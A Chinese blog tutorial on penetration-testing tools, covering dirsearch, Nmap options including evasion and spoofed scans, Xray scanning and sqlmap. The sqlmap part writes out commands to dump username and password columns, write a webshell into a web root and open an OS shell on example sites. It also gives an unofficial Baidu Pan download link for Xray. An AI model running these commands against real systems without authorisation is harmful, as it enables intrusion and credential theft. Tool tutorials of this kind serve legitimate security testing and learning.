渗透测试工具

前言

本篇文章总结了很好用的渗透测试工具,会不断更新!!!
供大家学习使用!!!

正文

01 信息收集

1.1 dirsearch

1.1.1介绍:
类似御剑扫描的一款网站目录扫描器,由python编写,功能强大。
1.1.2下载地址1:
dirsearch下载地址
1.1.3下载地址2:
1.1.4Kali使用:
如果kali里没有自带安装,直接输入dirsearch,会自动提示你是否安装,输入“Y”,然后就会自动安装好,就可以正常使用了。
在这里插入图片描述

**注意:**使用dirsearch需要python3.8以上的版本,kali最新版本自带python最新版本,可不用在装python,方便一点!!!!!

1.1.5开始使用:
在这里插入图片描述

1.2 Nmap

1.2.1 介绍:
介绍了端口扫描工具Nmap的安装及使用教程,此处介绍Kali中Nmap的使用,Windows上的后续补充给大家!!
1.2.2 下载地址1:
Windows上下载安装下载地址;
在这里插入图片描述
1.2.3 Kali使用:
Kali直接输入nmap便可以使用;
在这里插入图片描述
1.2.4 使用教程
** 常用参数**

-A           :全面扫描. 综合扫描. 是一种完整扫描目标信息的扫描方式.   
--exclude      : 排除指定的地址  例: nmap  192.168.1.0/24  
--exclude 192.168.1.1 那么就不会对192.168.1.1进行扫描,
--excludefile     : 排除指定的地址列表  例: nmap  192.168.1.0/24  --excludefile list.txt 那么就不会对list.txt里面的地址进行扫描,
-iL          : 扫描一个列表文件  例  nmap  -iL  list.txt
-sP        : Ping扫描,效率高,返回信息少.    例: nmap -sP 192.168.1.110 
-P0(Pn)      :无Ping扫描,可以躲避防火墙防护,可以在目标主机禁止ping的情况下使用
-PS        :TCP SYN Ping扫描
-PA        :TCP ACK Ping扫描
PR        : ARP Ping扫描
-n          : 禁止DNS反向解析
-T          : 时序选项, -TO-T5. 用于IDS逃逸,0=>非常慢,1=>缓慢的,2=>文雅的,3=>普通的,4=>快速的,5=>急速的
-p           : 指定端口扫描
-F           : 快速扫描
-f          : 报文分段
-D         : ip地址欺骗  例 nmap -D RND:5 192.168.1.110  RND:为生成随机ip地址 
-sS         : TCP SYN 扫描,速度快, 1秒1000次左右. 较为隐蔽.
-sT         : TCP连接扫描
-sU        : UDP扫描,扫描非常慢,容易被忽视
-sN,-sF       : 隐蔽扫描
-sI          : 空闲扫描,允许端口完全欺骗,可以允许不使用自身ip的情况下发起扫描,非常之隐蔽的扫描.但得先寻找空闲主机,指令为 nmap -p80 -open -script ipidseq 192.168......,第二种是往事随机寻找, nmap -p80 -open -script  ipidseq -iR 2000 (iR选项代表随机选择目标.2000带表选择的数量,-open代表只选择端口开放的空闲主机)
-p-         : 扫描所有端口  1-65535
-top-ports       : 只扫描开发概率最高的端口 后面跟上数值  例  nmap -top-ports  100 , 就是扫描概率最高的前100个端口
<版本探测相关>:
-sV          : 版本探测 ,通过相应的端口探测对应的服务,根据服务的指纹识别出相应的版本.
-sV --allports     : 只有使用--allports才能扫描所有的端口,默认情况下回跳过如 TCP9100端口(hp打印机专用端口)
--version-intersity   : 设置扫描强度 0-9 ,数值越大越有可能被识别,花费时间越多,默认是7
--version-ligth    : 扫描强度,轻量级扫描(2) ,等用于--version-intersity 2
--version-all       :扫描强度,重量级扫描(9)  ,等同于--version-intersity 9
--version-trace     : 获取详细的版本信息
-sR          : 判断开放端口是否为RPC端口, 如果是返回程序和版本号.
--resaon       : 显示主机存活原因

常用参数

1.Nmap的纯扫描,默认情况下,nmap会发出一个arp ping扫描,且扫描目标tcp端口,范围为1-10000。
nmap 127.0.0.1
2.NMAP普通扫描增加输出冗长(非常详细)
nmap -vv 127.0.0.1
3.端口扫描
nmap 127.0.0.1 -p 80  (指定定单个端口)
nmap 127.0.0.1 -p 1-100 (多个端口)
nmap 127.0.0.1 -p- (所有端口)
nmap -sP 10.1.112.89 (Ping扫描)
nmap -sS 127.0.0.1 -p 80 (SYN半连接扫描)
nmap -sT 127.0.0.1 -p 80  (TCP全连接扫描)
nmap -sU 127.0.0.1 (UDP扫描)
nmap -sF  127.0.0.1 (FIN,目标可能有IDS/IPS系统的存在,防火墙可能过滤掉SYN数据包,发送一个FIN标志的数据包不需要完成TCP的握手。)
4.路由追踪
nmap --traceroute 127.0.0.1
5.nmap设置扫描一个网段下的ip
nmap -sP 127.0.0.1 /24
6.扫描目标主机版本(不是很准确)
nmap -O 127.0.0.1 -p 80
7.扫描目标服务版本
nmap -O -sV 127.0.0.1 -p 80
8.全面扫描(包含了1-10000端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测)
nmap -A 127.0.0.1 -p-
9.保存结果
nmap -A 127.0.0.1 -p- -oN nmap1
10.nmap命令混合式扫描
nmap -vv -p1-100 -o 127.0.0.1
11.扫描多个目标
nmap 127.0.0.1 127.0.0.2
nmap 127.0.0.1-100 (扫描IP地址为127.0.0.1-127.0.0.100内的所有主机)
nmap -iL target.txt (namp在同一目录下,扫描这个txt内的所有主机)注:使用时请将127.0.0.1更换为目标IP地址

02 嗅探欺骗

03 漏洞扫描

3.1 Xray使用教程

3.1.1 xray扫描器介绍网络安全交流q:830709780
xray是一种功能强大的扫描工具。xray 社区版是长亭科技推出的免费白帽子工具平台,目前社区有 xray 漏洞扫描器和 Radium 爬虫工具,由多名经验丰富的安全开发者和数万名社区贡献者共同打造而成。

3.1.2 xray下载地址
链接:https://pan.baidu.com/s/1Y_hyIxIEqyo2ucdx7lWtrQ
提取码:1lzl

3.1.3 xray基本使用
下载对应系统的版本后,解压缩zip文件,Linux / Mac用户在终端(终端)运行,Windows用户请在Powershell或其他高级Shell中运行,在CMD中运行可能体验不佳。
1.使用基础爬虫爬取并对爬虫爬取的链接进行漏洞扫描:

xray webscan --basic-crawler http://example.com --html-output xxx.html

2.使用 HTTP 代理进行被动扫描:
设置浏览器 http 代理为http://127.0.0.1:5555,然后使用浏览器访问网页,就可以自动分析代理流量并扫描。

xray webscan --listen 127.0.0.1:5555 --html-output xxx.html

3.快速测试单个 url, 无爬虫:

xray webscan --url http://example.com/?a=b --html-output single-url.html

4.手动指定本次运行的插件:
默认情况下,将会启用所有内置插件,可以使用下列命令指定本次扫描启用的插件。

xray webscan --plugins cmd_injection,sqldet --url http://example.comxray webscan --plugins cmd_injection,sqldet --listen 127.0.0.1:7777

5.生成 ca 证书:

.\xray_windows_amd64.exe genca

04 漏洞利用

4.1 sqlmap使用教程

4.1.1 介绍
SQLMap是一个开放源码的测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。
具体功能

1、判断可注入的参数
2、判断可以用那种SQL注入技术来注入
3、识别出哪种数据库
4、根据用户选择,读取哪些数据
5、可执行情况
6、当前数据库用户名称和拥有的权限
7、发现WEB虚拟目录
8、上传***getshell
9、绕过防火墙

sqlmap支持的注入模式

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。(适合用于通过循环直接输出联合查询结果,否则只会显示第一项结果)
5、堆查询注入,可以同时执行多条语句的执行时的注入。

4.1.2 安装下载

1. kali自带sqlmap

可直接使用!
在这里插入图片描述

2. Windows下载地址:

sqlmap
在这里插入图片描述

4.1.3 常用请求参数

1. get方法

对于get的请求,比较简单,直接指定目标

-d: 直接连接数据库 (-d "mysql://user:passward@地址:端口/数据库名称")
-u:指定url  (?id=1)
-m:将多个url保存成文件,传给sqlmap (sqlmap -m list.txt)
-r:将http头信息保存到文件,交给sqlmap
-g:google搜索出来的结果 (-g "inurl:\".php?id=1\""\"只是将双引号内的"特殊字符进行转义
-p :只想检查的变量
-f :指纹
--users:数据库帐号
--banner:数据库信息--dbs:有哪些数据库
-a:all

get请求应该是大家所熟悉的,sqlmap - u直接加URL,参数就可以了。

2. POST方法
下面介绍几种对于post请求的sqlmap注入。
a.使用http请求文件
可以用burpsuite抓包并复制到txt文件

sqlmap -r  1 .txt

b.使用burpsuite log文件 (勾选上options中的Misc中的proxy)

sqlmap  - l log.txt

c.HTTPS
sqlmap同时也支持https的sql注入,只需加入参数-force-ssl告诉sqlmap这是https服务即可。

sqlmap -u https://192.168.1.1/a.php?id=1" -force-ssl  (默认不是443,在后加其端口)

4.1.4 常用方法

1. 检测注入

a.基本格式

sqlmap -u “http://www.vuln.cn/post.php?id=1

默认使用level1检测全部数据库类型

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbms mysql –level 3

指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
b. cookie注入
当程序有防get注入的时候,可以使用cookie注入

sqlmap -u “http://www.baidu.com/shownews.asp” –cookie “id=11” –level 2(只有level达到2才会检测cookie)

c. 从post数据包中注入
可以使用burpsuite或者temperdata等工具来抓取post包

sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql    指定username参数

2. 注入成功后

获取数据库基本信息

sqlmap -u “http://www.vuln.cn/post.php?id=1”  –dbs

查询有哪些数据库

sqlmap -u URL --current-db --batch 

获取当前数据库

sqlmap -u “http://www.vuln.cn/post.php?id=1”  -D test –tables

查询test数据库中有哪些表

sqlmap -u “http://www.vuln.cn/post.php?id=1” -D test -T admin –columns

查询test数据库中admin表有哪些字段

```bash
sqlmap -u “http://www.vuln.cn/post.php?id=1” -D test -T admin -C “username,password” –dump

dump出字段username与password中的数据

3. 其他命令参考下面
a. 从数据库中搜索字段

sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

在dedecms数据库中搜索字段admin或者password。

b. 读取与写入文件
首先找需要网站的物理路径,其次需要有可写或可读权限。

–file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

#示例:
sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”

使用shell命令:
sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell
接下来指定网站可写目录:
“E:\php\htdocs\dvwa”

#注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)

05 代码审计

06 密码攻击

07 常用字典

08 webshell

09 其他

总结

本篇文章总结了很好用的渗透测试工具,会不断更新!!!

830709780qq群
更多安全分享,请关注【安全info】微信公众号!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/21771.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

PentestGPT:一款由ChatGPT驱动的强大渗透测试工具

关于PentestGPT PentestGPT是一款由ChatGPT驱动的强大渗透测试工具,该工具旨在实现渗透测试任务执行过程的自动化。该工具基于ChatGPT实现其功能,允许广大研究人员以交互式的方式使用,并指导渗透测试人员进行渗透测试任务的总体进度调控并执行指定操作。 除此之外,Pentes…

利用ChatGPT进行内网域渗透学习

ChatGPT可以直接模拟在域内环境中的命令执行结果 1、查看共享 2、定位域控

考研政治考题分布、单选多选技巧Keywords、大题点默析

文章目录 一、考题分布(一) 选择33道 (16道单选&#xff0c;17道多选:16117250分)(二) 大题5道 (51050分) 二、选择技巧、选择题规律Keywords选择题规律 三、大题点默析结构 一、考题分布 (一) 选择33道 (16道单选&#xff0c;17道多选:16117250分) 1-4&#xff1a;马原4道单…

chatgpt-4它的未来是什么?该如何应用起来?

在当今快节奏的数字通信世界中&#xff0c;ChatGPT已成为一个强大的在线聊天平台&#xff0c;改变了人们互动和沟通的方式。凭借其先进的AI功能、用户友好的界面和创新技术&#xff0c;ChatGPT已成为个人和企业的热门选择。 然而&#xff0c;ChatGPT的未来有望更加激动人心和具…

万字干货!ChatGPT 从零完全上手实操指南!【二】

2.调教 GPT之奖惩指令 其实这个所谓“奖惩指令&#xff08;有监督学习&#xff09;”的作用和调教原理很好理解&#xff0c;它就像是我们教育孩子一样。 如果你希望孩子达到你理想的行为标准&#xff0c;那么你就需要对他进行教育&#xff0c;如果孩子做得好&#xff0c;我们就…

分享一些程序员接私活、兼职的平台

跟大家分享一下如何判断一个外包项目是否靠谱&#xff0c;有哪些接项目的渠道&#xff0c;以及其他接私活的经验。 判断项目是否靠谱&#xff0c;上来不说需求没有文档直接问你多少需要多少钱&#xff0c;说话不靠谱&#xff0c;可能就是打听价的&#xff0c;这样的项目无需太…

chatgpt赋能python:Python如何成为一名兼职SEO?

Python如何成为一名兼职SEO&#xff1f; 简介 SEO&#xff0c;即搜索引擎优化&#xff0c;是一种很有前途的职业。随着互联网的发展&#xff0c;越来越多的公司意识到网站能为自己带来的价值&#xff0c;从而开始注重SEO。如果你想在这个领域探索机会&#xff0c;那么Python就…

【大虎与二狗】预算减半KPI不变,你该怎么办?

“哎呀&#xff0c;今天又没抢到&#xff0c;名额太少了&#xff0c;下次你们帮我一起哈”。 不需要抬头看&#xff0c;陈虎就知道说话的是楠楠。作为部门里自诩的“文青“&#xff0c;楠楠最爱的就是穷游&#xff0c;而最近每天10点她都会守在电脑前抢购某旅游平台“3999五一…

AI绘画大全 Midjourney13000+gpt最新注册+使用教程+关键词描述词 软件+教程

AI绘画大全 Midjourney13000gpt最新注册使用教程关键词描述词 软件教程 AI绘画大全&#xff1a;Midjourneygpt最新注册和使用教程&#xff0c;Midjourney13000AI绘画关键词描述词等&#xff08;教程软件&#xff09; ai美术馆-第一周 3.Ai绘图变现渠道 4.Ai生成图 2.30AI绘…

遥感云大数据在灾害、水体与湿地领域典型案例实践及GPT模型

近年来遥感技术得到了突飞猛进的发展&#xff0c;航天、航空、临近空间等多遥感平台不断增加&#xff0c;数据的空间、时间、光谱分辨率不断提高&#xff0c;数据量猛增&#xff0c;遥感数据已经越来越具有大数据特征。遥感大数据的出现为相关研究提供了前所未有的机遇&#xf…

GEE入门学习,遥感云大数据分析、管理与可视化以及在林业应用丨灾害、水体与湿地领域应用丨GPT模型应用

目录 ①海量遥感数据处理与GEE云计算技术实践应用 ②GPT模型支持下的Python-GEE遥感云大数据分析、管理与可视化技术及多领域案例实践应用 ③GEE遥感云大数据林业应用典型案例实践及GPT模型应用 ④遥感云大数据在灾害、水体与湿地领域典型案例实践及GPT模型应用 ①海量遥感…

AI工具在科研领域的应用(全网最全)

编者寄语&#xff1a; AI工具的潮流磅礴而至&#xff0c;诸多应用已从曾经的“玩具”华丽蜕变为实用强大的“工具”&#xff0c;学术界的翘楚们亦纷纷投入其研究和应用。作为追求卓越的科研人员&#xff0c;我们岂能袖手旁观&#xff0c;任凭自己在学术与科研工作中渐行渐远&am…

遥感云大数据在灾害、水体与湿地领域典型案例实践及GPT模型应用

目录 平台及基础开发平台 GEE基础知识与ChatGPT等AI模型交互 重要知识点微型案例串讲与GPT模型交互演示 案例一、洪涝灾害监测 案例二、洪水敏感性和风险模拟 案例三、水体质量监测 案例四、河道轮廓监测 案例五、地下水变化监测 案例六、红树林遥感制图 以Earth Engi…

免费好用的思维导图工具,让你事半功倍

&#x1f505;思维导图是一种以图形化的形式展示思维过程和思维关系的工具。它经常用于制定计划&#x1f3af;、做学习&#xff08;工作&#xff09;笔记&#x1f4dd;、做手帐&#x1f9fe;等&#xff0c;帮助人们梳理思路&#xff0c;发散思维&#x1f647;&#x1f3fc;♀️…

机器人专业讲师与科技的转型思考

2023年以前&#xff0c;编程需要学习各种语法&#xff0c;现在只需要提示词。 未来还需要编程老师吗&#xff1f;需求一定越来越少。 “ Prompting TurtleSim from ChatGPT ” https://github.com/mhubii/chatgpt_turtlesim The demo lets ChatGPT call into ROS services …

AI4S 与 AIGC 时代,云上 Notebook 将如何革新教学与科研体系

随着以 ChatGPT 为代表的 AIGC&#xff08;AI-Generated Content&#xff09;技术的极速普及、以及 AI4S&#xff08;AI for Science&#xff09;从愿景走向流行&#xff0c;不同领域、不同背景的人们以一种前所未有的方式连接在了一起&#xff0c;共同经历着知识结构、技术体系…

MathGPT是什么,MathGPT与ChatGPT的区别是什么,MathGPT十大应用场景

MathGPT是一种基于自然语言处理技术的数学语言模型&#xff0c;其目的是通过自动化生成数学公式、证明和解题步骤等来辅助数学学习和研究。 与ChatGPT相比&#xff0c;MathGPT主要关注数学领域而非通用性的自然语言理解&#xff0c;因此其训练语料库和预测任务都与数学有关&…

AI绘画之Midjourney从小白到入门保姆级教学

大家好&#xff0c;我是可乐。 随着ChatGPT的发布&#xff0c;这段时间各种衍生的AIGC&#xff08;利用人工智能技术来生成内容&#xff09;工具层出不穷&#xff0c;通过文字生成文字&#xff0c;比如 ChatGPT、文心一言、new bing等等&#xff1b;通过文字生成视频&#xff…

通向AGI的规划和展望 - Sam Altman ,the CEO of OpenAI

我们OpenAI的使命是确保AGI(通用人工智能) - 一种智能程度普遍高于人类的AI系统可以造福于全人类。如果我们成功创建了AGI&#xff0c;这项技术可以丰富我们的生活、推动全球经济发展&#xff0c;帮助我们发现能改变人类目前所受限的新技术&#xff0c;提升全人类的幸福。 AGI有…

HTML的入门与进阶学习

一、简介 1、前端最核心技术 HTML (犹如骨架&#xff0c;毛坯房) CSS&#xff08;装潢&#xff0c;把页面渲染更好看&#xff09;二 二、基础内容 1.基础总结 1.内核划分 谷歌 火狐 ie 360浏览器 苹果浏览器 欧朋浏览器等等这些浏览器分别对应不同内核&#xff0c; 想让其浏览器…